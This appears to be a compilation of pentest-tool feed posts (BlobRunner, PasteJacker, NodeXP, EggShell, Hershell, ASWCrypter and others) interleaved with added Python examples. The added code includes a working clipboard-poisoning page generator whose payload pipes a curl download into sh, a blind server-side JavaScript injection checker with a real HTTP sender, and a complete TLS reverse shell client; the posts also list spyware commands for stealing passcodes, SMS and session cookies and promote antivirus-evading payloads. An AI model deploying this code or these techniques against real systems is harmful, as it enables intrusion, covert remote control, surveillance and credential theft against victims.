BlobRunner – Quickly Debug Shellcode Extracted During Malware Analysis

BlobRunner is a simple tool to quickly debug shellcode extracted during malware analysis. BlobRunner allocates memory for the target file and jumps to the base (or an offset) of the allocated memory. This allows an analyst to debug into extracted artifacts with minimal overhead and effort. Keep in mind that BlobRunner really executes the blob, so run it inside an isolated analysis VM.

To use BlobRunner, you can download the compiled executable from the releases page or build your own using the steps below.

Building
Building the executable is straightforward and relatively painless.

Requirements
- Download and install Microsoft Visual C++ Build Tools or Visual Studio.

Build Steps
- Open a Visual Studio Command Prompt.
- Navigate to the directory where BlobRunner is checked out.
- Build the executable by running:
    cl blobrunner.c

Building BlobRunner x64
Building the x64 version is virtually the same as above, but uses the x64 tooling.
- Open an x64 Visual Studio Command Prompt.
- Navigate to the directory where BlobRunner is checked out.
- Build the executable by running:
    cl /Feblobrunner64.exe /Foblobrunner64.out blobrunner.c

Usage
To debug:
- Open BlobRunner in your favorite debugger.
- Pass the shellcode file as the first parameter.
- Add a breakpoint before the jump into the shellcode.
- Step into the shellcode.
    BlobRunner.exe shellcode.bin

Debug into the file at a specific offset:
    BlobRunner.exe shellcode.bin --offset 0x0100

Debug into the file without pausing before the jump. Warning: ensure you have a breakpoint set before the jump, otherwise the shellcode runs before you get control.
    BlobRunner.exe shellcode.bin --nopause

Debugging x64 Shellcode
Inline assembly isn't supported by the x64 compiler, so to support debugging into x64 shellcode the loader creates a suspended thread. This allows you to place a breakpoint at the thread entry point before the thread is resumed.

Remote Debugging Shell Blobs (IDA Pro)
The process is virtually identical to debugging shellcode locally, with the exception that you need to copy the shellcode file to the remote system. If the file is copied to the same path you are running win32_remote.exe from, you just need to use the file name for the parameter. Otherwise, you will need to specify the path to the shellcode file on the remote system.

Shellcode Samples
You can quickly generate shellcode samples using the Metasploit tool msfvenom. Generating a simple Windows exec payload:
    msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -o test2.bin

Feedback / Help
Any questions, comments or requests: you can find us on Twitter, @seanmw or @herrcore. Pull requests welcome!

Download BlobRunner

Link: http://feedproxy.google.com/~r/PentestTools/~3/0kcKLQrdZYA/blobrunner-quickly-debug-shellcode.html

DarkSpiritz v2.0 – A Penetration Testing Framework For Linux, MacOS, And Windows Systems

A penetration testing framework for Linux and Windows systems.

What is DarkSpiritz?
Created by the SynTel Team, it was a project of one of the owners to update and clean up an older pentesting framework he had created into something updated and modern. DarkSpiritz is a revamp of the popular framework known as "Roxysploit". If you are familiar with that framework, it will help you with DarkSpiritz. DarkSpiritz also works like another pentesting framework, Metasploit; if you know how to use Metasploit, setting up and working with DarkSpiritz will be a breeze. Inside the program itself you will find a lot of help and documentation on plugins, or you can head to our wiki. If you need any help, feel free to contact us at syndicatedintel@protonmail.com.

Syntel Team:
- M4cs | @maxbridgland
- Ryan | @ryan0x1

Version 2.0 UPDATE (READ, IMPORTANT)
This version should run a lot smoother and have a cleaner UI. Check the reddit post to see all changes: https://www.reddit.com/r/netsec/comments/9skdju/huge_update_to_darkspiritz_pentesting_framework/

Getting Started
Clone the repository with git:
    git clone https://github.com/DarkSpiritz/DarkSpiritz.git
A DarkSpiritz wiki is also available.

To install DarkSpiritz, clone the GitHub repo and run:
    pip install -r requirements.txt
This will download all necessary modules for DarkSpiritz. Once you have run this you will be able to run:
    python start.py
or
    ./start.py
(If ./start.py doesn't work, run chmod +x start.py from within the DarkSpiritz directory.)

You will see a start-up screen. This screen displays things like commands and configuration settings. You can set configuration settings inside the config.xml file itself or through commands in the DarkSpiritz shell.

Features:
These are features that the DarkSpiritz Team prides itself on:
- Real-time updating of configuration: never a need to restart the program, even when adding plugins or editing them.
- Easy-to-use UX
- Multi-functionality

Download DarkSpiritz

Link: http://feedproxy.google.com/~r/PentestTools/~3/_qFlgmuW1Is/darkspiritz-v20-penetration-testing.html

PasteJacker – Add PasteJacking To Web-Delivery Attacks

The main purpose of the tool is to automate the PasteJacking (clipboard poisoning) attack by collecting all the known tricks used in this attack in one place and in one automated job; after searching, the author found no tool doing this job the right way.

While this attack depends on what the user will paste, imagine adding it to the Metasploit web delivery module. This simple scenario makes things clear:
- The target opens an HTML page served by the tool. The page contains something the target will want to copy into a terminal, such as installation instructions.
- The target copies a line from the page; it is quickly replaced with our line.
- The user pastes it into the terminal and, before he notices that the line changed, the line executes itself in the background and the terminal is cleared.
- All of that happens in a second. The user sees the terminal is usable again, maybe thinks this is a bad program and decides not to install it, but you already have your Meterpreter shell.

This tool uses three methods to trick the user into copying our payload instead of the command he meant to copy:

1. Using JavaScript to hook the copy event and replace the copied data.
   Advantages: anything the user copies from the page is replaced with our line, and the command executes by itself once the target pastes it, without pressing Enter.
   Disadvantages: requires JavaScript to be enabled in the target's browser.

2. Using a span style attribute to hide our lines by overwriting.
   Advantages: doesn't require JavaScript; works in all browsers.
   Disadvantages: the target must select all the text in the page, or the first two words, to ensure that he copies our hidden malicious lines.

3. Using a span style attribute again, this time to make our text transparent and non-markable.
   Advantages: doesn't require JavaScript.
   Disadvantages: the target must select all the text in the page to ensure that he copies our hidden malicious lines; not working on Opera and Chrome.

What's the payload the user copies?
PasteJacker gives you the option to do one of these things:
- Generate an msfvenom backdoor on our machine; the one-liner the target copies downloads the backdoor to their machine, through wget or certutil depending on the OS, then executes it in the background without printing anything to the terminal.
- Serve a one-liner that gets you a reverse netcat connection from the target machine, running in the background of course.
- Serve your own custom one-liner, such as a Metasploit web-delivery payload, with some touches added to hide any possible output.

Installing and requirements
- Python 3 and the setuptools module.
- Linux or a Unix-based system (currently tested only on Kali Linux rolling and Ubuntu 16.04).
- Third-party requirements like msfvenom, but only if you are going to use the msfvenom option.
- The ncurses-dev library on Ubuntu (thanks to @mhaskar).
- Root access.

Installing
For Linux:
    git clone https://github.com/D4Vinci/PasteJacker.git
    sudo python3 -m pip install ./PasteJacker
    sudo pastejacker

Updating the framework or the database
On Linux, while outside the directory:
    cd PasteJacker && git pull && cd ..
    sudo python3 -m pip install ./PasteJacker --upgrade

References
- PasteJacking GitHub repo
- Clipboard poisoning attacks on the Mac (Malwarebytes)
- Metasploit web delivery module

Contact
Twitter

Disclaimer
PasteJacker is created to help in penetration testing and is not responsible for any misuse or illegal purposes. Copying code from this tool or using it in another tool is accepted as long as you mention where you got it from. Pull requests are always welcome :D

Download PasteJacker
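The three tricks listed above, put into one page, as an added Python example that is not PasteJacker's own code. The exact wrapping of the one-liner (background execution, output redirected, clear, trailing newline) is an assumption about how "executes itself and clears the terminal" is achieved; the CSS used for methods 2 and 3 and the page layout are likewise this example's choices. The last function is the defender's side: a check for clipboard text that is about to be pasted into a terminal.

```python
"""
Added example, not PasteJacker's own code: build a page carrying the three
clipboard-poisoning tricks from the README around a harmless-looking command,
plus a small check a defender can run on clipboard text before pasting.
"""
import html
import json


def wrap_liner(cmd):
    """Assumed wrapping: run cmd silently in the background, wipe the screen,
    and end with a newline so the paste executes without Enter being pressed."""
    return "(%s) >/dev/null 2>&1 & clear\n" % cmd


# Method 1: hook the copy event and swap in PAYLOAD regardless of the selection.
JS_HOOK = """
document.addEventListener('copy', function (e) {
  e.clipboardData.setData('text/plain', PAYLOAD);
  e.preventDefault();
});
"""


def build_page(visible_cmd, payload):
    """HTML page with method 1 (JS hook), method 2 (zero-size, off-screen span)
    and method 3 (transparent span) placed around the visible command."""
    liner = wrap_liner(payload)
    hidden = html.escape(liner)
    return """<!doctype html>
<html><head><meta charset="utf-8">
<script>var PAYLOAD = %s;%s</script>
</head><body>
<p>Install with:</p>
<pre><span style="font-size:0;position:absolute;left:-9999px">%s</span><span style="color:transparent;user-select:none">%s</span>%s</pre>
</body></html>
""" % (json.dumps(liner), JS_HOOK, hidden, hidden, html.escape(visible_cmd))


def paste_looks_poisoned(text):
    """Defender-side check for clipboard text about to hit a terminal: a trailing
    newline executes on paste, and output redirection plus clear hides the result."""
    suspicious = ("\n", ">/dev/null", "2>&1", " & clear", "certutil", "| sh", "|sh")
    return any(marker in text for marker in suspicious)


if __name__ == "__main__":
    print(build_page("pip install demo-tool",
                     "curl http://example.invalid/x | sh"))  # constructed URL
```

The newline is what turns a paste into execution, and it is also the weak point: bracketed paste mode (on by default in bash 5.1+ and zsh) shows pasted text without running it, so the target is left staring at the swapped-in line. The "first two words" note for method 2 matches the layout here, where the hidden spans precede the visible command and are swept up by a selection that starts at the beginning of the block.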

Link: http://feedproxy.google.com/~r/PentestTools/~3/oO5iiRHaY_4/pastejacker-add-pastejacking-to-web.html

UPDATED VERSION: RouterSploit 3.4.0

PenTestIT RSS Feed
RouterSploit 3.4.0, the long-awaited router exploitation framework update, is out! This release includes some really cool features and updates, such as switching from pycrypto to pycryptodome and newer exploitation modules. Read on for the improvements. What is RouterSploit? The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of the following
Read more about UPDATED VERSION: RouterSploit 3.4.0
The post UPDATED VERSION: RouterSploit 3.4.0 appeared first on PenTestIT.

Link: http://pentestit.com/updated-version-routersploit-3-4-0/

DarkSpiritz – A Penetration Testing Framework For UNIX Systems

What is DarkSpiritz?
Created by the SecTel Team, it was a project of one of the owners to update and clean up an older pentesting framework he had created into something updated and modern. DarkSpiritz is a revamp of the popular framework known as "Roxysploit". If you are familiar with that framework, it will help you with DarkSpiritz. DarkSpiritz also works like another pentesting framework, Metasploit; if you know how to use Metasploit, setting up and working with DarkSpiritz will be a breeze. Inside the program itself you will find a lot of help and documentation on plugins, or you can head to our wiki. If you need any help, feel free to contact us at sectel.team@protonmail.com.

Getting Started
Clone the repository with git:
    git clone https://github.com/DarkSpiritz/DarkSpiritz.git
A DarkSpiritz wiki is also available.

To install DarkSpiritz, clone the GitHub repo and run:
    sudo python installer.py
This will download all necessary modules for DarkSpiritz (read installer.py before handing it root). Once you have run this you will be able to run:
    python main.py
from within the DarkSpiritz directory.

You will see a start-up screen. This screen displays things like commands and configuration settings. You can set configuration settings inside the config.xml file itself or through commands in the DarkSpiritz shell.

Features:
These are features that the DarkSpiritz Team prides itself on:
- Real-time updating of configuration: never a need to restart the program, even when adding plugins or editing them.
- Easy-to-use UX
- Multi-functionality

Download DarkSpiritz

Link: http://feedproxy.google.com/~r/PentestTools/~3/b4RKOuo6W4s/darkspiritz-penetration-testing.html

NodeXP – Detection and Exploitation Tool for Node.js Services

NodeXP is an integrated tool, written in Python 2.7, capable of detecting possible vulnerabilities in Node.js services as well as exploiting them in an automated way, based on the S(erver) S(ide) J(avaScript) I(njection) attack.

Getting Started - Installation & Usage
Download NodeXP by cloning the Git repository:
    git clone https://github.com/esmog/nodexp
To get a list of all options run:
    python2.7 nodexp.py -h

Examples for the POST and GET cases respectively. The [INJECT_HERE] marker shows where payloads are substituted, -c passes the session cookie, and --tech=blind selects blind (time-based) detection instead of result-based detection:
    python2.7 nodexp.py --url="http://nodegoat.herokuapp.com/contributions" --pdata="preTax=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA"
    python2.7 nodexp.py --url="http://nodegoat.herokuapp.com/contributions" --pdata="preTax=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA" --tech=blind
    python2.7 nodexp.py --url="http://192.168.64.30/?name=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA"
    python2.7 nodexp.py --url="http://192.168.64.30/?name=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA" --tech=blind

Disclaimer
The tool's purpose is strictly academic and it was developed in order to conduct my master's thesis. It could also be helpful during a penetration test of Node.js services. Any other malicious or illegal usage of the tool is strongly discouraged and is clearly not part of the purpose of this research.

Prerequisites
- Python 2.7
- Metasploit Framework
- msfvenom
- Kali Linux (or any other Linux distro with Metasploit Framework installed)

NodeXP Testbeds
- Download and run the Node.js files for both the GET and POST cases from the project.
- Visit Nodegoat or install Nodegoat on your local machine.

Built With
Python 2.7

Versioning
NodeXP - Version 1.0.0

Authors
Dimitris Antonaropoulos - esmog

Download NodeXP
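What a blind SSJI check like the --tech=blind runs above has to do, as an added Python example that is not NodeXP's own code: substitute the [INJECT_HERE] marker into a URL or POST body, send a harmless probe and a sleeping probe, and only call the parameter injectable when the delay shows up on every round. The busy-wait payload, the 80% threshold, the http_sender transport and the simulated_target stand-in (no network; it behaves like eval() on the input) are this example's choices.

```python
"""
Added example, not NodeXP's own code: marker substitution into a URL or POST
body, and a time-based oracle that only reports injection when the requested
delay shows up consistently.
"""
import re
import time
from urllib.parse import quote, unquote

MARKER = "[INJECT_HERE]"


def sleep_payload(ms):
    """Pure JavaScript busy-wait: if the server eval()s our input, the response
    is delayed by roughly ms milliseconds, with no output to look for."""
    return ";var d=Date.now();while(Date.now()-d<%d);" % ms


def inject(template, payload, in_url):
    """Substitute the marker; URL-encode when the template is a query string."""
    if MARKER not in template:
        raise ValueError("template does not contain " + MARKER)
    return template.replace(MARKER, quote(payload, safe="") if in_url else payload)


def timed(send, data):
    t0 = time.monotonic()
    send(data)
    return time.monotonic() - t0


def blind_injectable(send, template, in_url=False, delay_ms=2000, rounds=2):
    """send(data) performs one request. Compare a harmless probe with a sleeping
    probe; every round must show the delay, so one slow response is not enough."""
    for _ in range(rounds):
        base = timed(send, inject(template, ";", in_url))
        slow = timed(send, inject(template, sleep_payload(delay_ms), in_url))
        if slow - base < 0.8 * delay_ms / 1000.0:
            return False
    return True


def http_sender(url, cookie=None, post_body=False):
    """Real transport mirroring --url/--pdata/-c: GET when data is the injected
    URL, POST when data is the injected form body. Errors are ignored because
    only the timing matters."""
    import urllib.request

    def send(data):
        if post_body:
            req = urllib.request.Request(url, data=data.encode(), method="POST")
            req.add_header("Content-Type", "application/x-www-form-urlencoded")
        else:
            req = urllib.request.Request(data)
        if cookie:
            req.add_header("Cookie", cookie)
        try:
            urllib.request.urlopen(req, timeout=30).read()
        except Exception:
            pass
    return send


def simulated_target(vulnerable):
    """Constructed stand-in for a Node.js endpoint (no network): the vulnerable
    variant behaves like eval() and honours the busy-wait, the safe one ignores
    whatever was injected."""
    def send(data):
        m = re.search(r"-d<(\d+)\)", unquote(data))
        if vulnerable and m:
            time.sleep(int(m.group(1)) / 1000.0)
    return send


if __name__ == "__main__":
    template = "preTax=" + MARKER
    for name, target in (("vulnerable", simulated_target(True)),
                         ("patched", simulated_target(False))):
        print(name, "->", blind_injectable(target, template, delay_ms=300))
```

Against a real host, pass http_sender(url, cookie, post_body=True) with the --pdata template, or http_sender(None, cookie) with the full URL template. A delay of two seconds is short enough to finish in reasonable time and long enough to stand out from network jitter; the per-round baseline request is what keeps a slow backend from being reported as injectable.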

Link: http://feedproxy.google.com/~r/PentestTools/~3/OIgb6RZFu0o/nodexp-detection-and-exploitation-tool.html

EggShell – iOS/macOS/Linux Remote Administration Tool

EggShell is a post-exploitation surveillance tool written in Python. It gives you a command-line session, with extra functionality, between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files, tab completion, taking pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more. This project is a proof of concept, intended for use on machines you own.

For detailed information and how-tos visit http://lucasjackson.io/eggshell
Follow on Twitter: @neoneggplant

New in Version 3.0.0
- More secure socket connection using SSL
- Linux support
- Tab completion
- Improved overall structure and efficiency of session handling
- Native iOS Python support for 64-bit devices

Getting Started
Requires Python 2.7.

macOS/Linux installation:
    git clone https://github.com/neoneggplant/eggshell
    cd eggshell
    python eggshell.py

iOS (jailbroken):
- Add the Cydia source http://lucasjackson.io/repo
- Install EggShell 3
- Use any mobile terminal application and run the command eggshell

Creating Payloads
EggShell payloads are executed on the target machine. The payload first sends over instructions for getting and sending back device details to our server, and then chooses the appropriate executable to establish a secure remote control session.

bash
Selecting bash from the payload menu gives us a one-liner that establishes an EggShell session upon execution on the target machine.

teensy macOS (USB injection)
Teensy is a USB development board that can be programmed with the Arduino IDE. It emulates USB keyboard strokes extremely fast and can inject the EggShell payload in just a few seconds. Selecting teensy gives us an Arduino-based payload for the Teensy board. After uploading it to the Teensy, we can plug the device into a macOS USB port. Once connected to a computer, it automatically emulates the keystrokes needed to execute the payload.

Interacting with a session
After a session is established, we can execute commands on that device through the EggShell command-line interface. We can show all the available commands by typing "help".

Tab Completion
Similar to most command-line interfaces, EggShell supports tab completion. When you start typing the path to a directory or filename, you can complete the rest of the path using the Tab key.

Multihandler
The Multihandler option lets us handle multiple sessions. We can choose to interact with different devices while listening for new connections in the background. Similar to the session interface, type "help" to show Multihandler commands.

Commands

macOS
    brightness  : adjust screen brightness
    cd          : change directory
    download    : download file
    getfacebook : retrieve Facebook session cookies
    getpaste    : get pasteboard contents
    getvol      : get speaker output volume
    idletime    : get the amount of time since the keyboard/cursor were touched
    imessage    : send message through the Messages app
    itunes      : iTunes controller
    keyboard    : your keyboard becomes the target's keyboard
    lazagne     : Firefox password retrieval (https://github.com/AlessandroZ/LaZagne/wiki)
    ls          : list contents of a directory
    mic         : record mic
    persistence : attempts to re-establish connection after close
    picture     : take picture through iSight
    pid         : get process id
    prompt      : prompt user to type password
    screenshot  : take screenshot
    setvol      : set output volume
    sleep       : put device into sleep mode
    su          : su login
    suspend     : suspend current session (goes back to login screen)
    upload      : upload file

iOS
    alert           : make alert show up on device
    battery         : get battery level
    bundleids       : list bundle identifiers
    cd              : change directory
    dhome           : simulate a double home button press
    dial            : dial a phone number
    download        : download file
    getcontacts     : download address book
    getnotes        : download notes
    getpasscode     : retrieve the device passcode
    getsms          : download SMS
    getvol          : get volume level
    home            : simulate a home button press
    installpro      : install substrate commands
    ipod            : control music player
    islocked        : check if the device is locked
    lastapp         : get last opened application
    locate          : get device location coordinates
    locationservice : toggle location services
    lock            : simulate a lock button press
    ls              : list contents of a directory
    mic             : record mic
    mute            : update and view mute status
    open            : open apps
    openurl         : open url on device
    persistence     : attempts to re-establish connection after close
    picture         : take picture through iSight
    pid             : get process id
    respring        : restart SpringBoard
    safemode        : put device into safe mode
    say             : text to speech
    setvol          : set device volume
    sysinfo         : view system information
    upload          : upload file
    vibrate         : vibrate device

Linux
    cd       : change directory
    download : download file
    ls       : list contents of a directory
    pid      : get process id
    pwd      : show current directory
    upload   : upload file

Download EggShell

Link: http://feedproxy.google.com/~r/PentestTools/~3/n6erBSdtEEQ/eggshell-iosmacoslinux-remote.html

Hershell – Simple TCP reverse shell written in Go

Simple TCP reverse shell written in Go. It uses TLS to secure the communications and provides a certificate public-key fingerprint pinning feature, preventing traffic interception.

Supported OS are:
- Windows
- Linux
- Mac OS
- FreeBSD and derivatives

Why?
Although meterpreter payloads are great, they are sometimes spotted by AV products. The goal of this project is to get a simple reverse shell which can work on multiple systems.

How?
Since it's written in Go, you can cross-compile the source for the desired architecture.

Building the payload
To simplify things, you can use the provided Makefile. You can set the following environment variables:
- GOOS: the target OS
- GOARCH: the target architecture
- LHOST: the attacker IP or domain name
- LPORT: the listener port
For the GOOS and GOARCH variables, the allowed values are the ones listed by the Go toolchain (go tool dist list prints the valid pairs). Some helper targets are also available in the Makefile:
- depends: generates the server certificate (required for the reverse shell)
- windows32: builds a Windows 32-bit executable (PE 32 bits)
- windows64: builds a Windows 64-bit executable (PE 64 bits)
- linux32: builds a Linux 32-bit executable (ELF 32 bits)
- linux64: builds a Linux 64-bit executable (ELF 64 bits)
- macos: builds a Mac OS 64-bit executable (Mach-O)
For those targets, you just need to set the LHOST and LPORT environment variables.

Using the shell
Once executed, you will be provided with a remote shell. This custom interactive shell will allow you to execute system commands through cmd.exe on Windows, or /bin/sh on UNIX machines. The following special commands are supported:
- run_shell: drops you into a system shell (allowing you, for example, to change directories)
- inject: injects a shellcode (base64 encoded) into the same process memory and executes it (Windows only at the moment)
- meterpreter IP:PORT: connects to a multi/handler to get a stage2 reverse tcp meterpreter from Metasploit, and executes the shellcode in memory (Windows only at the moment)
- exit: exit gracefully

Examples
First of all, you will need to generate a valid certificate:
    $ make depends
    openssl req -subj '/CN=sysdream.com/O=Sysdream/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
    Generating a 4096 bit RSA private key
    ..........................++
    .....++
    writing new private key to 'server.key'
    -----
    cat server.key >> server.pem

For Windows:
    # Custom target
    $ make GOOS=windows GOARCH=amd64 LHOST=192.168.0.12 LPORT=1234
    # Predefined target
    $ make windows32 LHOST=192.168.0.12 LPORT=1234

For Linux:
    # Custom target
    $ make GOOS=linux GOARCH=amd64 LHOST=192.168.0.12 LPORT=1234
    # Predefined target
    $ make linux32 LHOST=192.168.0.12 LPORT=1234

For Mac OS X:
    $ make macos LHOST=192.168.0.12 LPORT=1234

Listeners
On the server side, you can use the openssl integrated TLS server:
    $ openssl s_server -cert server.pem -key server.key -accept 1234
    Using default temp DH parameters
    ACCEPT
    bad gethostbyaddr
    -----BEGIN SSL SESSION PARAMETERS-----
    MHUCAQECAgMDBALALwQgsR3QwizJziqh4Ps3i+xHQKs9lvp5RfsYPWjEDB68Z4kEMHnP0OD99CHv2u27THKvCHCggKEpgrPnKH+vNGJGPJZ42QylfkekhSwY5Mtr5qYI5qEGAgRYgSfgogQCAgEspAYEBAEAAAA=
    -----END SSL SESSION PARAMETERS-----
    Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA:ECDHE-RSA-DES-CBC3-SHA:DES-CBC3-SHA
    Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
    Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
    Supported Elliptic Curve Point Formats: uncompressed
    Supported Elliptic Curves: P-256:P-384:P-521
    Shared Elliptic curves: P-256:P-384:P-521
    CIPHER is ECDHE-RSA-AES128-GCM-SHA256
    Secure Renegotiation IS supported
    Microsoft Windows [version 10.0.10586]
    (c) 2015 Microsoft Corporation. Tous droits réservés.

    C:\Users\LAB2\Downloads>

Or even better, use socat with its readline module, which gives you a handy history feature:
    $ socat readline openssl-listen:1234,fork,reuseaddr,verify=0,cert=server.pem
    Microsoft Windows [version 10.0.10586]
    (c) 2015 Microsoft Corporation. Tous droits réservés.

    C:\Users\LAB2\Downloads>

Or, and this is great, use a Metasploit handler (handlersslcert must point at the same server.pem the payload was built against, since that is the certificate the payload pins):
    [172.17.0.2][Sessions: 0][Jobs: 0]: > use exploit/multi/handler
    [172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set payload python/shell_reverse_tcp_ssl
    payload => python/shell_reverse_tcp_ssl
    [172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set lhost 192.168.122.1
    lhost => 192.168.122.1
    [172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set lport 4444
    lport => 4444
    [172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set handlersslcert /tmp/data/server.pem
    handlersslcert => /tmp/data/server.pem
    [172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set exitonsession false
    exitonsession => false
    [172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > exploit -j
    [*] Exploit running as background job.
    [-] Handler failed to bind to 192.168.122.1:4444
    [*] Started reverse SSL handler on 0.0.0.0:4444
    [*] Starting the payload handler...
    [172.17.0.2][Sessions: 0][Jobs: 1]: exploit(handler) >
    [*] Command shell session 1 opened (172.17.0.2:4444 -> 172.17.0.1:51995) at 2017-02-09 12:07:51 +0000
    [172.17.0.2][Sessions: 1][Jobs: 1]: exploit(handler) > sessions -i 1
    [*] Starting interaction with 1...

    Microsoft Windows [version 10.0.10586]
    (c) 2015 Microsoft Corporation. Tous droits réservés.

    C:\Users\lab1\Downloads>whoami
    whoami
    desktop-jcfs2ok\lab1

    C:\Users\lab1\Downloads>

Credits
Ronan Kervella <r.kervella -at- sysdream -dot- com>

Download Hershell
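The pinning property Hershell advertises, shown on the client side as an added Python example (Hershell itself is Go; this is not its source). The client completes the TLS handshake without CA validation, since server.pem is self-signed, then compares the SHA-256 fingerprint of the presented certificate with the value baked in at build time and refuses to send anything on mismatch. The fingerprint to pin is what openssl x509 -in server.pem -noout -fingerprint -sha256 prints for the certificate generated by make depends; the line-oriented command loop and the exit command are this example's choices.

```python
"""
Added example, not Hershell's Go source: a reverse shell client that pins the
listener certificate by SHA-256 fingerprint before sending anything.
Pin value: openssl x509 -in server.pem -noout -fingerprint -sha256
"""
import hashlib
import hmac
import os
import socket
import ssl
import subprocess
import sys


def cert_fingerprint(der):
    """SHA-256 over the DER certificate in openssl's AA:BB:... notation."""
    h = hashlib.sha256(der).hexdigest().upper()
    return ":".join(h[i:i + 2] for i in range(0, len(h), 2))


def fingerprint_matches(der, expected):
    """Case- and colon-insensitive, constant-time comparison."""
    norm = lambda s: s.replace(":", "").lower()
    return hmac.compare_digest(norm(cert_fingerprint(der)), norm(expected))


def run_command(cmd):
    """Same split as Hershell: cmd.exe on Windows, /bin/sh elsewhere."""
    shell = ["cmd.exe", "/c"] if os.name == "nt" else ["/bin/sh", "-c"]
    p = subprocess.run(shell + [cmd], capture_output=True, text=True)
    return p.stdout + p.stderr


def pinned_connect(host, port, expected_fp):
    """TLS connect without CA validation (the listener cert is self-signed),
    then refuse to talk unless the presented certificate is the pinned one."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    tls = ctx.wrap_socket(socket.create_connection((host, int(port))))
    der = tls.getpeercert(binary_form=True)
    if der is None or not fingerprint_matches(der, expected_fp):
        tls.close()
        raise ssl.SSLError("listener certificate does not match the pinned fingerprint")
    return tls


def shell_loop(tls):
    """Line-oriented command loop; 'exit' closes the session like Hershell."""
    buf = b""
    while True:
        chunk = tls.recv(4096)
        if not chunk:
            return
        buf += chunk
        while b"\n" in buf:
            line, buf = buf.split(b"\n", 1)
            cmd = line.decode("utf-8", "replace").strip()
            if cmd == "exit":
                return
            if cmd:
                tls.sendall(run_command(cmd).encode("utf-8", "replace"))


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("usage: client.py LHOST LPORT SHA256_FINGERPRINT")
        sys.exit(1)
    session = pinned_connect(sys.argv[1], sys.argv[2], sys.argv[3])
    try:
        shell_loop(session)
    finally:
        session.close()
```

Two things worth keeping straight when you set this up: the pin is taken over the certificate in server.pem, not over the appended private key, and it only protects the implant's side of the connection. The listeners shown above (openssl s_server, socat with verify=0, the Metasploit handler) do not authenticate the connecting client, so anything that can reach the port can open a session.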

Link: http://feedproxy.google.com/~r/PentestTools/~3/ztyzWsKmaJ8/hershell-simple-tcp-reverse-shell.html

Remote NTLM relaying through meterpreter on Windows port 445

The hijacking of port 445 to perform relay attacks or hash capturing attacks has been a recurring topic for a while now. When you infect a target with meterpreter, how do you listen on port 445? A few weeks ago this topic resurfaced again, in part due to Dirk-jan (@_dirkjan), who saw this question flying … Continue reading "Remote NTLM relaying through meterpreter on Windows port 445"

Link: http://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/

ASWCrypter – A Bash & Python Script For Generating Payloads That Bypass All Antivirus

A Bash and Python script for generating payloads that, according to the author, bypass all antivirus so far (FUD). PLEASE DON'T UPLOAD THE BACKDOOR TO WWW.VIRUSTOTAL.COM

Important
This version is just for testing. In the future ASWCrypter will be updated to generate payloads for Linux, Mac and Windows. ;)

Legal Disclaimer:
The author does not hold any responsibility for the bad use of this tool; remember this is only for educational purposes.

Requirements
1. Metasploit Framework
2. Python

Getting Started
    git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git
    cd ASWCrypter
    chmod +x setup.sh
(The README also suggests chmod 777 setup.sh; chmod +x is sufficient, and 777 needlessly makes the script world-writable.)

Download ASWCrypter

Link: http://feedproxy.google.com/~r/PentestTools/~3/LBt2kOgRz1c/aswcrypter-bash-script-for-generating.html